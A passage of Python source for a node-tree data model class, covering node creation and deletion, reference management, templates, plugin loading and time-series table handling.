id = self.__get_id(desc)
if not id: return None
response = copy.deepcopy(self.model[id])
response["browsePath"]=self.get_browse_path(id)
if response["children"]!=[]:
children =[]
for childId in response["children"]:
childInfo = copy.deepcopy(self.model[childId])
childInfo["browsePath"]=self.get_browse_path(childId)
children.append(childInfo)
response["children"]=children
return response
def get_models(self):
"""
get the available model files from the disk under /models
: Returns: a list of strings
"""
try:
mydir = myGlobalDir
os.chdir(mydir) # to enable import easily
files = os.listdir(mydir + '/models')
# take only the ones with '.json, but cut the '.model.json' extension
models = [f.split('.model')[0] for f in files if f.endswith(".json")]
return models
except Exception as ex:
self.logger.error("Model.get_models() failed "+str(ex))
return []
def get_info(self):
"""
get some information about the model
Returns: (dict) key value pairs on information of the model,
"""
return {"name":self.currentModelName}
def import_plugins_from_directory(self, plugin_directory: str, check_file_marker = True):
""" find all plugins from plugin_directory.
take from there the templates from the files and the functions
Args:
check_file_marker: if set to True, we expect a "#21datalabplugin" string in the first line
"""
if plugin_directory not in sys.path:
sys.path.append(plugin_directory) # for the importlib to find the stuff
plugin_filenames = glob.glob(os.path.join(plugin_directory, '**/*.py'), recursive=True)
for fileName in plugin_filenames:
if fileName.startswith('__'):
continue # avoid __pycache__ things
#we need to check if extra plugins have the "#21datalabplugin
if check_file_marker:
absolutePath = os.path.join(myGlobalDir,fileName)
f = open(absolutePath,"r")
firstLine = f.readline()
f.close()
if firstLine != "#21datalabplugin\n":
continue
filename_relative = os.path.relpath(fileName, plugin_directory)
moduleName = os.path.splitext(filename_relative)[0].replace(os.path.sep, '.')
self.logger.info(f"import plugin lib {moduleName}")
module = importlib.import_module(moduleName)
module = importlib.reload(module) # if we change an already imported, python uses the cache, so to make sure we always get the latest, reimport here
#now analyze all objects in the module
for objName in dir(module):
if objName.startswith('__'):
continue # these are python generated info objects, we don't want them
element = getattr(module,objName)
if type(element) is dict:
#this is a template information
self.templates[moduleName+"."+objName]=copy.deepcopy(element)
elif (inspect.isclass(element)):
newClass = {"module":module,"class":element}
self.objectClasses[moduleName + "." + objName] = newClass
elif callable(element):
#this is a function, get more info
newFunction = {"module":module, "function":element}
self.functions[moduleName+"."+objName]=newFunction
def import_default_plugins(self):
""" find all plugins (= all .py files in the ./plugin folder
take from there the templates from the files and the functions
don't check them for #21datalabplugin marker
this function is execution on startup of the model
"""
self.import_plugins_from_directory(os.path.join(myGlobalDir, 'plugins'),check_file_marker=False)
def get_id(self,ids):
""" convert a descriptor or a list into only ids (which can be used as entry to the model dictionary
Args:
ids (string, list(string)): a single or list of strings containing either and id ("101") or browsepath ("root.myfolder.myvar")
Returns:
a list(id) or id as string
"""
with self.lock:
if type(ids) == type(list()):
newList = []
for id in ids:
newList.append(self.__get_id(id))
return newList
elif type(ids) == type(dict()):
newDict = {}
for oldId in ids:
id = self.__get_id(oldId)
newDict[id]=ids[oldId] #also copy the value
return newDict
else:
#assume its scalar
return self.__get_id(ids)
def get_browse_path(self,desc):
"""
Args:
desc(string): a node id or browsepatch
Returns:
(string) a browsepath
"""
with self.lock:
id = self.get_id(desc)
if not id in self.model:
return None
path = self.model[id]["name"]
while 1:
id = self.model[id]["parent"]
if id =="0":
break
else:
path = self.model[id]["name"]+"."+path
return path
def push_nodes(self,nodeDicts):
"""
push a ready nodedict into the mode
this is a dangerous function as it does not adjust references, parent/child relations whatsoever
you must take care of that yourself
"""
for nodeDict in nodeDicts:
self.logger.warning(f"pushing node {nodeDict['id'], nodeDict['name']}")
self.model[nodeDict["id"]]=copy.deepcopy(nodeDict)
self.__notify_observers([],None) # just trigger the treeupdate for now
#xxx todo notify!
def create_node(self,parent="root",type="folder",value=None,name="newNode",properties={}):
"""
create a node inside the model by giving several infos
Args:
parent: a descriptor (browsepath or id) of the parent
type: the type of the node
value: (optional) give a value for the node
name(string): a name of the node, must be unique under the parent
properties (dict): a dictionary containing further key-values to be placed into the node as properties
Returns:
(string) nodeid,
None for problem durinf creation
"""
#check if parent exists
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return None
#check if same name existst already
newpath = self.get_browse_path(parent)+"."+name
if self.get_id(newpath):
#we found it, it exists alreay, so we can't create it
return None
# we can create this node
if self.idCreationHash == True:
newId = str((random.randrange(2**64))) # a 64 bit random value
else:
self.globalIdCounter += 1
newId = str(self.globalIdCounter)
newNode = copy.deepcopy(self.nodeTemplate)
newNode.update({"id":newId,"name":name,"type":type,"parent":parentId})
if properties !={}:
newNode.update(properties)
if value != None:
newNode["value"]=value
self.model[parentId]["children"].append(newId)
self.model[newId] = newNode
if newNode["type"] == "timeseries":
self.time_series_create(newId)
if newNode["type"] == "eventseries":
self.event_series_create(newId)
if newNode["type"] == "object":
if "class" not in newNode:
newNode["class"]=None
if "autoReload" not in newNode:
newNode["autoReload"] = False # set this to true means: on a "instantiate object, we reload the module
self.__notify_observers(parentId,"children")
return newNode["id"]
def create_node_from_path(self,path,properties={"type":"variable"}):
"""
create a node from a path given, all intermediate nodes of th path given that do not yet exist are also created as folder type
Args:
path(string): the path to the node to be creates
properties(dict): the properties of the node
example:
create_node_from_path("root.myfolder.something.thisvar")
this will create myfolder as folder, something as folder, thisvar as variable and will also
set all hierarchies correctly
Returns:
(string) the nodeid created or
None if problem during creation
"""
currentNode = "root" #root
with self.lock:
for node in path.split('.')[1:-1]:
if not self.__get_id(currentNode+'.'+node):
#this one does not exist, so make it
self.create_node(currentNode,name=node)
currentNode += '.'+node
return self.create_node(parent=currentNode,name=path.split('.')[-1],properties=properties)
def create_nodes_from_template(self,parent="root",template=[]):
"""
deprecated!! this is the old style of templates as lists, now it's a dict
Create a node from a template; a template is a list of node-dicts,
Args:
parent(string): descriptor of the parent node under which the nodes of the template should be created
template: a list of node dicts of the nodes to be creates, children are allowed as dict
Returns:
(boolenan) True for created, False for error
Example:
create_nodes_from_template(parent="root.myfolder",[{"name":"myvariable1","type":"variable"},
{"name":"myfolder","type":"folder","children":[
{"name":"mysubvar","type":"variable"}]])
"""
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return False
newNodeIds = [] #these must be corrected later
for node in template:
#we take all info from the nodes and insert it into the tree
nodeName = node["name"]
newNodeId = self.create_node(parentId,name=nodeName,properties=node)
newNodeIds.append(newNodeId)
#do we have "children per template syntax"?, then remove that property from the nodes and make more nodes
if "children" in self.model[newNodeId]:
savedChildren = copy.deepcopy(self.model[newNodeId]["children"])
self.model[newNodeId]["children"]=[] # empty out
for child in savedChildren:
newChildId = self.create_node(newNodeId,name=child["name"],properties=child)
newNodeIds.append(newChildId)
#now correct missing stuff
for nodeId in newNodeIds:
if self.model[nodeId]["type"]== "referencer":
# convert the path of references into an id: get the parent path, add the tail, convert to id
forwardReferences =self.model[nodeId]["forwardRefs"] #make a copy, we'll delete this
self.model[nodeId]["forwardRefs"]=[]
parentPath = self.get_browse_path(self.model[nodeId]["parent"])
for forwardRef in forwardReferences:
forwardPath = parentPath+forwardRef
self.add_forward_refs(nodeId,[forwardPath])
return True
def __create_nodes_from_path_with_children(self,parentPath,nodes):
"""
recursive helper function for create_template_from_path
e build all nodes under the parentPath on this level and then the children
we return a list of all created node ids
"""
createdNodes = []
for node in nodes:
newModelNode = {}
for k, v in node.items():
if k not in ["children", "parent", "id", "browsePath"]: # avoid stupid things
newModelNode[k] = v
newId = self.create_node_from_path(parentPath+'.'+newModelNode["name"],newModelNode)
if newId:
createdNodes.append(newId)
if "children" in node:
createdNodes.extend(self.__create_nodes_from_path_with_children(parentPath+'.'+newModelNode["name"],node["children"]))
return createdNodes
def create_template_from_path(self,path,template):
"""
Create a template from a path given, the template contains one or more nodes
the path must not yet exist!
Args:
path(string): the path under which the template will be placed. the template always contains
a root node, this will be renamed according to the path
Returns:
(boolenan) True for created, False for error
"""
with self.lock:
#first create the template root node
#we rename the template according to the path requested
template["name"]=path.split('.')[-1]
parentPath = '.'.join(path.split('.')[:-1])
newNodeIds = self.__create_nodes_from_path_with_children(parentPath,[template])
self.logger.debug(f"create_template_from_path, new nodeids: {newNodeIds}")
#now adjust the references of new nodes and of the ones that were there
for newNodeId in newNodeIds:
if "references" in self.model[newNodeId]:
#we must create forward references
for ref in self.model[newNodeId]["references"]:
# now there are two options:
# the given path is of the form templatename.levelone.leveltwo inside the template
# we replace the "templatename" with the path name the template was given
# or the path is absolute id or browsepath, then we don't modify
splitted = ref.split('.')
if len(splitted) == 1 or splitted[0]=="root":
targetPath = ref
else:
targetPath = parentPath+'.'+template['name']+'.'+'.'.join(ref.split('.')[1:])
self.add_forward_refs(newNodeId,[targetPath])
del self.model[newNodeId]["references"] # we remove the reference information from the template
def get_templates(self):
"""
give all templates loaded
Returns: a dict with entries containing the full templates
"""
with self.lock:
return copy.deepcopy(self.templates)
def add_forward_refs(self,referencerDesc,targets,allowDuplicates = True):
"""
adding forward references from a referencer to other nodes, the forward references are appended at the list
of forward references of the referencer node
references to oneself are not allowed
Args:
referenderDesc (string): descriptor of the referencer node from which we want to add forward references
targets (list(descriptors)): listof node descriptors to which we want to add forward refs
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(referencerDesc)
if not fromId:
self.logger.error("can't set forward ref on "+str(referencerDesc))
return False
if type(targets) is not list:
targets = [targets]
if targets==[]:
return True
if not self.model[fromId]["type"]=="referencer":
self.logger.error("can't set forward ref on "+str(referencerDesc)+ "is not type referencer, is type"+self.model[fromId]["type"])
return False
for target in targets:
toId = self.get_id(target)
if not toId:
continue
if toId == fromId:
continue
if not allowDuplicates:
if toId in self.model[fromId]["forwardRefs"]:
continue # ignore this forwards ref, we have it already
self.model[toId]["backRefs"].append(fromId)
self.model[fromId]["forwardRefs"].append(toId)
self.__notify_observers(fromId,"forwardRefs")
return True
def lock_model(self):
self.lock.acquire()
def release_model(self):
self.lock.release()
def get_model(self):
"""
Returns: the full deepcopy of the internal model object (list of dictionaries of the nodes)
"""
with self.lock:
#also add the browsepath to all nodes
for nodeid in self.model:
self.model[nodeid]["browsePath"]=self.get_browse_path(nodeid)
return copy.deepcopy(self.model)
def get_model_for_web(self,getHash=False):
"""
Returns: the full deepcopy of the internal model object (list of dictionaries of the nodes)
but leaving out the column values (this can be a lot of data)
and the file values (files are binary or strings with big size, typically serialized ML-models)
for files and columns, we either return a string "len 12344" or a sha1 hash value 133344
"""
model = {}
p=utils.Profiling("get_model_for_web")
with self.lock:
for nodeId, nodeDict in self.model.items():
if nodeDict["type"] in ["column","file","timeseries","eventseries"]:
# with columns we filter out the values
node = {}
for nk, nv in nodeDict.items():
if nk == "value":
try:
if not getHash:
node[nk] = "len " + str(len(nv))
else:
start = datetime.datetime.now()
hash = hashlib.sha1(nv.tobytes())
node[nk] = hash.hexdigest()
self.logger.debug(f"hashed {nodeDict['name']} in {(datetime.datetime.now()-start).total_seconds()} hash:{node[nk]}")
except:
node[nk] = "None"
else:
node[nk] = copy.deepcopy(nv) # values can be list, dict and deeper objects
model[nodeId] = node
elif nodeDict["type"]=="object":
node={k:v for k,v in nodeDict.items() if k!="object"}
model[nodeId]=node
else:
#this node is not a colum, can still hold huge data
model[nodeId] = copy.deepcopy(nodeDict) # values can be list, dict and deeper objects nodeDict
model[nodeId]["browsePath"] = self.get_browse_path(nodeId) #also add the browsepath
self.logger.debug(f"{p}")
return model
def remove_forward_refs(self,sourceDesc,targetDescriptors = [], deleteDuplicates=False):
"""
remove forward references from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
targets: a list of descriptors, if missing we delete all
deleteDuplicates: if set true, we delete all referenes to a target if we hae more than one reference
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(sourceDesc)
if not fromId:
return False
if not self.model[fromId]["type"] == "referencer":
return False # only for referencers
if targetDescriptors == []:
targets = self.model[fromId]["forwardRefs"].copy()
else:
targets = self.get_id(targetDescriptors)
if targets == []:
return True# nothing to do
for toId in targets:
if not toId:
continue # we skip Nones coming from the get_id
if deleteDuplicates:
# maybe multiple entries
while toId in self.model[fromId]["forwardRefs"]: # maybe multiple entries
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
else:
# we delete only one entry
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
self.__notify_observers(fromId,"forwardRefs")
return True
def remove_forward_ref(self,sourceDesc,targetDesc):
"""
remove a forward reference from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(sourceDesc)
toId = self.get_id(targetDesc)
if not fromId or not toId:
return False
if not self.model[fromId]["type"]=="referencer":
return False # only for referencers
try:
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
self.__notify_observers(fromId, "forwardRefs")
return True
except:
return False
def remove_back_ref(self,sourceDesc,targetDesc):
"""
remove a backwards reference from any node to a referencer, this also removes the forwardreferece from the target
actually, this function is just a helper. Normally, we only talk about "forward references";
each forward reference also creates a backwards reference in the model, but this is just for internal look up speed
the reference here is targetDesc -> (forwardRef) -> sourceDesc
Args:
sourceDesc: the descriptor of the node that holds a backwards reference
targetDesc: the descriptor of the node that holds the forward reference
Returns:
True/False for success
"""
with self.lock:
return self.remove_forward_ref(targetDesc,sourceDesc)
def add_property(self,nodeDesc,property,value):
"""
add a random property entry for a node, a node is a key-value store, a property is a key with a value
Args:
nodeDesc: the descriptor of the node
property: the key to be created on the node
value: the value to be stored for this property
Returns:
True for create
False for node not found or if the property already exists
"""
with self.lock:
id = self.get_id(nodeDesc)
if not id:
return False
if property in self.model[id]:
return False # have this property already
self.model[id][property]=value
self.__notify_observers(id, property)
return True
def set_properties(self,properties={},nodeDesc=None):
"""
changes a random set of properties given by the dict or adds them if not existant, some properties are not allowed here:
children, parent, forward and back ward refs, allowed are all others including type, name, value
Args:
nodeDesc: the descriptor of the node, is optional, can also be given as browsePath or id in he properties dict
properties: the new properties or changed
Returns:
True for done
False for node not found or if the property already exists
"""
with self.lock:
if nodeDesc:
id = self.get_id(nodeDesc)
elif "id" in properties:
id = properties["id"]
elif "browsePath" in properties:
id = self.get_id(properties["browsePath"])
else:
self.logger.error("set properties is missing id ")
return False
if not id:
return False
notificationProperties = []
for k,v in properties.items():
if k in ["id","browsePath","children","parent","forwardRefs","backRefs"]:
continue # we ignore these entries
self.model[id][k]=v # overwrite or set new
notificationProperties.append(k)
self.__notify_observers(id,notificationProperties)
return True
def find_all_children_recursive(self,nodeIds):
""" find all children recursively, give a list of """
with self.lock:
children = []
for id in nodeIds:
if self.model[id]["children"]:
children.extend(self.find_all_children_recursive(self.model[id]["children"]))
children.append(id)
return children
#delete node and all subnodes
def delete_node(self,desc):
"""
delete a node and all its recursive children;
flow:
1) make a list of all nodes to be deleted
2) rip off all references to /from delete nodes
3) delete all nodes
4) notify observers about children change on the delete nodes
desc(string): the descriptor of the node
Returns:
True for success
False for node not found
"""
with self.lock:
id = self.get_id(desc)
if not id:
return False
nodesToDelete = self.find_all_children_recursive([id])
self.logger.debug(f"delete nodes {nodesToDelete}")
childNotify = []
#first rip off all references
for id in nodesToDelete:
forwards = self.model[id]["forwardRefs"].copy()
backwards = self.model[id]["backRefs"].copy()
for forward in forwards:
self.remove_forward_ref(id,forward) # this will also trigger observers
for backward in backwards:
self.remove_back_ref(id,backward) # this will also trigger observers
#now delete the acutal nodes
for id in nodesToDelete:
parentId = self.model[id]["parent"]
if parentId in self.model:
self.model[parentId]["children"].remove(id)
childNotify.append(parentId)
if self.model[id]["type"]=="timeseries":
self.time_series_delete(id)
del self.model[id]
#now notify only those who still exist
goodNotify=[]
for id in childNotify:
if id in self.model:
goodNotify.append(id)
if goodNotify:
self.__notify_observers(goodNotify, "children") # make ONE call for the observers
return True
# if desc.type is a var, function then we just set the value
# if it's a timeseries" then we set a column in a table, padded if needed
def set_value(self,desc,value):
"""
set the value property of a node, if the node does not have a value property yet, it is created here
Args:
desc(string): node descriptor
value (any): any value to be stored
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
#convert if table:
if self.model[id]["type"] == "column":
value = numpy.asarray(value,dtype=numpy.float64)
self.model[id]["value"] = value
self.__notify_observers(id,"value")
return True
def get_value(self,desc):
"""
read out the "value" property of a node
Args:
desc(string): the node that holds the value
Returns:
the value
None if the node has no "value" property
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
if self.model[id]["type"] == "timeseries":
values = self.time_series_get_table(id)
if values:
return self.time_series_get_table(id)[id]["values"]
else:
return None
if "value" in self.model[id]:
return copy.deepcopy(self.model[id]["value"])
else:
return None
def __copy_node(self,id,resolveChildren=False):
"""
get a copy of a node, we don't create a node in the model here!
copy node with all properties, if the node is a "column", we don't copy the value
if the resolveChildren is set to true, we also copy the direct children
the copied node can't be used to create a node, as it is the copy of an existing node!
Args:
id (string): the node id to be copied
resolveChildren (bool): False to not copy the children (the new node has no children)
True to copy-create also the children
Return:
(dict) the node
"""
newNode = {}
for key in self.model[id]:
if key == "value" and self.model[id]["type"]in ["column","file","timeseries"]:
newNode["value"]=None
elif key == "children" and resolveChildren:
#we also copy the children
newNode["children"]=[]
for childId in self.model[id]["children"]:
childNode = self.__copy_node(childId)
newNode["children"].append(childNode)
else:
newNode[key]=copy.deepcopy(self.model[id][key])
return newNode
def __get_targets(self,id):
"""
#this is a recusive helper function for the get_leaves function
"""
targets=[]
if self.model[id]["type"] == "referencer":
for targetId in self.model[id]["forwardRefs"]:
targets.extend(self.__get_targets(targetId))
elif self.model[id]["type"] == "folder":
for targetId in self.model[id]["children"]:
targets.extend(self.__get_targets(targetId))
else:
addNode = self.__copy_node(id,resolveChildren=True)
addNode["browsePath"]=self.get_browse_path(id)
targets = [addNode]
return targets
def get_leaves_ids(self,desc):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
leaves = self.get_leaves(desc) # a list of node dicts
leaveIds = []
for leave in leaves:
leaveIds.append(leave["id"])
return leaveIds
def get_leaves(self,desc,allowDuplicates=False):
"""
this function returns a list of dicts containing the leaves where this referencer points to
this functions works only for nodes of type "referencer", as we are following the forward references
leaves are defined as following:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if nodes pointed to are referencer, the targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all node dicts which are considered leaves as a list of node dicts
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
targets=self.__get_targets(id)
if targets and targets[0]["id"] == id:
#this can happen if the node is not a folder, ref and had no children
targets.pop(0)
#before we return, we remove duplicates if wanted
if targets and allowDuplicates == False:
reducedTargets = []
ids = []
for t in targets:
if t["id"] in ids:
continue
reducedTargets.append(t)
ids.append(t["id"])
return reducedTargets
else:
return targets
def __get_referencer_parents(self,ids):
backRefs = []
#we look back from this node
for id in ids:
if self.model[id]["type"] == "referencer":
#we take this one in
backRefs.append(id)
#plus we look further up
thisBackRefs = self.model[id]["backRefs"]
if thisBackRefs:
backRefs.extend(self.__get_referencer_parents(thisBackRefs))
return backRefs
def get_referencers_old(self,desc):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deep: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
ids = [self.model[id]["parent"],id]
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def get_referencers(self,desc,deepLevel = 1):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deepLevel: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
we give the number of parent levels to include in the search at the leaves
default is 1, so the node itself and its parent
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
if not deepLevel:
ids = [self.model[id]["parent"],id]
else:
ids = self._get_parents(id,deepLevel)
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def _get_parents(self,id,deepLevel = -1):
ids = []
while id != "1" and deepLevel >= 0:
ids.append(id)
deepLevel -=1
id = self.model[id]["parent"]
return ids
#get a table with values like in the table stored, start and end times are optional
# if start, end not given, then we get the full table with no postprocessing at all
def get_timeseries_table_old(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,includeBackGround=None):
with self.lock:
variables = self.get_id(variables)
return self.timeSeriesTables.get_value_table(variables, startTime=startTime, endTime=endTime, noBins=noBins,
agg=agg,
includeTimeStamps=includeTimeStamps) # ,startTime,endTime)
'''
if startTime == None and endTime ==None:
#request the full table
variables = self.get_id(variables) # convert all to ids
return self.timeSeriesTables.get_value_table(variables,startTime=startTime,endTime=endTime,noBins=noBins,agg=agg,includeTimeStamps=includeTimeStamps)#,startTime,endTime)
else:
# this is a more details request, we will try to deliver the data in bins and with
# aggretation postprocessing
variables = self.get_id(variables) # convert all to ids, not browsepath
return self.timeSeriesTables.get_value_table(variables,startTime,endTime,noBins,agg,includeTimeStamps=includeTimeStamps)
'''
#used in the Node class, give a column variable or the table itself, return the nodeid of the time variable of that table
def find_table_time_node(self,desc):
with self.lock:
table = self.__find_table(self.get_id(desc))
if not table:
return None
pathToTimeIndex = self.get_browse_path(table)+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id'] # this referencer must point to only one node
return timeColumnId
def find_table_node(self,desc):
"""
get the node id of a table giving a column node of the table as input
Args
desc[string]: a node descriptor of a column node belonging to the table
Returns:
the node id of the table node
"""
with self.lock:
return self.__find_table(desc)
def get_child(self,desc,childName):
"""
get a child based on the name given
Args:
desc: node descriptor of the node under which we look for children
name: the child name to look for
Returns:
a nodeid if we find the child with "name" under the desc or none if not found
:return:
"""
with self.lock:
nodeInfo = self.get_node_info(desc)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.get_node_info(childId)
if childInfo["name"] == childName:
return childId
return None
def get_children_dict(self,desc):
"""
create a dictionary with key= childName and value = nodedict
Args:
desc: the nodedescriptor
Returns:
a dict
"""
with self.lock:
childrenDic={}
id = self.get_id(desc)
if not id:
return None
for childId in self.model[id]["children"]:
child = self.get_node_info(childId)
childrenDic[child["name"]]=child
return childrenDic
def get_table_len(self,desc):
"""
get the current length of a table
Args:
desc: the node descriptor of type table
Returns:
the current length of the columns of the table, none if error
"""
with self.lock:
tableId = self.get_id(desc)
if not tableId: return None
if not self.model[tableId]["type"]=="table": return None
try:
columnid = self.get_child(tableId,"columns")
if not columnid: return None
columnIds = self.get_leaves_ids(columnid)
if columnIds:
return len(self.model[columnIds[0]]["value"])
except:
return None
def get_timeseries_table(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,format="array",includeBackGround=None):
"""
get a time series table from variables. The table is returned as a list[list] object
all variables requested must be of type "column" and must belong to the same table:
all columns requested here must have a direct backreference to the same node of type "columns"
todo: also allow "columns" to point to folders or multiple hierarchies of referencing/folders
Args:
variables (list(nodedescriptors)): nodes to be part the data table requested (ordered!)
startime, endTime: the start and endtime of the table given as seconds since epoch
#we also allow the special case of endTime = 0 and startTime = -interval
# we also allow the special case of startTime given and end time= 0
noBins(int): the number of samples to be returned inside the table between start end endtime,
if None is given, we return all samples (rows) we have in the table and to not aggregate
agg(string): the aggregation function to be used when we downsample the data,
"sample": this means, we just pick out values (we sample) the data set, this is actually not an aggregation
includeTimesStampe (bool): currently ignored
includeBackGround (bool): currently ignored
Returns(dict)
key : value
"__time" : list of timestamps for the returned table in epoch seconds
"variable1": the list of float values of one of the requested variables
"""
with self.lock:
#first check if all requested timeseries are columns from the same table
vars = self.get_id(variables)
table = []
for var in vars:
if self.model[var]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(var))
if len(set(table)) != 1 or set(table)== {None}:
self.logger.warning("not the same table")
return False
#get the time field, and make fancy indexing via numpy arrays
pathToTimeIndex = self.get_browse_path(table[0])+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id']
if startTime and endTime:
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where((times>=startTime) & (times<=endTime))[0]
#xxx todo find the right index
elif startTime and not endTime:
#special cases for [-startTime:] and [startTime:] requests
if startTime < 0:
#this is the special case that we take an interval from the end
endTime = self.model[timeColumnId]["value"][-1]# the last
startTime = endTime +startTime # as startTime is negative this is actually substraction
else:
#starttime is positive
pass
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where(times >= startTime)[0]
else:
indices = numpy.arange(0,len(self.model[timeColumnId]["value"])) ## all indices
#now resample the indices to have the right bins number
if noBins:
varIndices = np.linspace(indices[0], indices[-1], noBins, endpoint=False, dtype=int)
else:
varIndices = indices
if format=="array":
result = []
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data=original.tolist() # apply the selection with the indices list
result.append(data)
else:
result = {}
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data = original.tolist() # apply the selection with the indices list
result[var]=data
result["__time"]=np.asarray(self.model[timeColumnId]["value"])[varIndices].tolist()
return result
def add_timeseries(self,blob,fast=False):
"""
add a dictionary of variables to a table, we check if the variables belong to the same table
also, times that come in as datetime object are converted to epoch seconds
Args:
blob (dict): a dictionary containing keys (node descriptors) and values (scalars)
Returns:
True/False for success
"""
with self.lock:
table = []
for key in blob:
id = self.get_id(key)
if not id:
self.logger.warn("add_timeseries count not find the variable:" + str(key))
return False
if self.model[id]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(id))
if len(set(table)) != 1 or set(table) == {None}:
self.logger.warn("not the same table")
return False
#here, the request is parsed as ok, let's put the values
for key in blob:
id = self.get_id(key)
value = blob[key]
if type(self.model[id]["value"]) is not list:
self.model[id]["value"]=[]
#we auto-convert time stamps
if type(value) is datetime.datetime:
value = date2secs(value)
self.model[id]["value"].append(value)#finally put the value
#return the id of the table, give a column variable
def __find_table(self,desc):
"""
return the node id of the table, give a column variable
!! this has no lock, must be called under lock
Args:
desc(string): node descriptor of type column or the table itself
Returns:
the node id of the table to which the desc node belongs
"""
id = self.get_id(desc)
if not id: return False
if self.model[id]["type"] == "table":
return id
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
return self.model[ref]["parent"]
return None
def ts_table_add_blob(self,dataBlob):
"""
this function add a data blob to an existing table, it accepts multiple values at once to speed up internals
Args:
dataBlob (dict or list(dict)): containing key:value pair with key=a descriptor of a column of one table
value: a scalar or list or numpy array of values
"""
if type(dataBlob) is list:
self.logger.error("currently no support for list blobs")
return None
with self.lock:
#first find the table and decide for the type conversion
for key in dataBlob:
if key != '__time':
tableId = self.__find_table(key)
break
if not tableId:
self.logger.error("can't find the table of "+str(dataBlob[list(dataBlob.keys())[0]]))
tableNode =self.get_node(tableId)
columnsType = numpy.float64 # this is the default
# make sure the time is there and convert it: we accept datetime objects, iso strings or floats seconds
# plus, the key will be the time node id afterwards
timeNode = tableNode.get_child("timeField").get_leaves()[0]
#try to find the time entry in the dataBlob, rename it to the timenode id
timeKeyOptions = ['__time',timeNode.get_browse_path(),timeNode.get_id()]
for timeKeyOption in timeKeyOptions:
if timeKeyOption in dataBlob:
dataBlob[timeNode.get_id()] = dataBlob.pop(timeKeyOption) # from now on the time field is names as its browsepath
break
if timeNode.get_id() not in dataBlob:
self.logger.error("time field entry missing")
return False
#now check if all are on the same table and convert the keys to node ids
variables = list(dataBlob.keys())
for var in variables:
if self.__find_table(var) != tableId:
self.logger.error("variables are not on the same table")
return False
id = self.get_id(var)
if id != var:
dataBlob[self.get_id(var)]=dataBlob.pop(var) # make new entry as nodeid
#now check the sizes of the incoming data and convert them to the requested type
inputSizes = set()
for key,value in dataBlob.items():
if key == timeNode.get_id():
#if we handle the time node, we might have to convert
if type(value) is list or type(value) is numpy.ndarray:
newValues = []
#newValues = numpy.asarray([],dtype=numpy.float64)
for val in value:
newValues.append(date2secs(val))
dataBlob[key] = numpy.asarray(newValues,dtype=numpy.float64) # write it back to the data
else:
#it is a scalar
dataBlob[key] = numpy.asarray([date2secs(value)],dtype=numpy.float64)
else:
if numpy.isscalar(dataBlob[key]):
dataBlob[key]=numpy.asarray([dataBlob[key]],dtype=columnsType) # make a list if it is scalar
else:
dataBlob[key]=numpy.asarray(dataBlob[key],dtype=columnsType) # if it is a numpy array already, numpy makes no copy
inputSizes.add(dataBlob[key].shape[0])
if len(inputSizes)!=1:
self.logger.error("incoming data has different len, can't hande as padding is unclear")
# when we are here, we have converted all incoming data ot numpy arrays, all belong to the same table
# and all have the same length, we are ready to put them inside
#print("through")
#now append them
return self.__ts_table_add_row(dataBlob,tableNodeId=tableId)
def __ts_table_add_row(self,dataBlob,tableNodeId=None,autoPad=True,pad=numpy.NaN):
"""
must be called under lock !!
this function accepts a dataBlob which is ready to be inserted, we don't make any more checks here
it must use variables from one table, it must contain data as numpyarrays
variables of the tables which are missing will be filled with pad if autoPad is true
"""
if not tableNodeId:
tableNode = self.get_node(self.__get_table(list(dataBlob.keys())[0]))
else:
tableNode = self.get_node(tableNodeId)
dataLen = dataBlob[list(dataBlob)[0]].shape[0]
columnNodes = tableNode.get_child("columns").get_leaves()
for columnNode in columnNodes:
id = columnNode.get_id()
if id in dataBlob:
#we add that one to the table
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = dataBlob[id]
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],dataBlob[id])
else:
#we must pad
self.loger.debug("we are padding "+id+" with % ",dataLen)
if type(self.model[id]['value']) != numpy.ndarray:
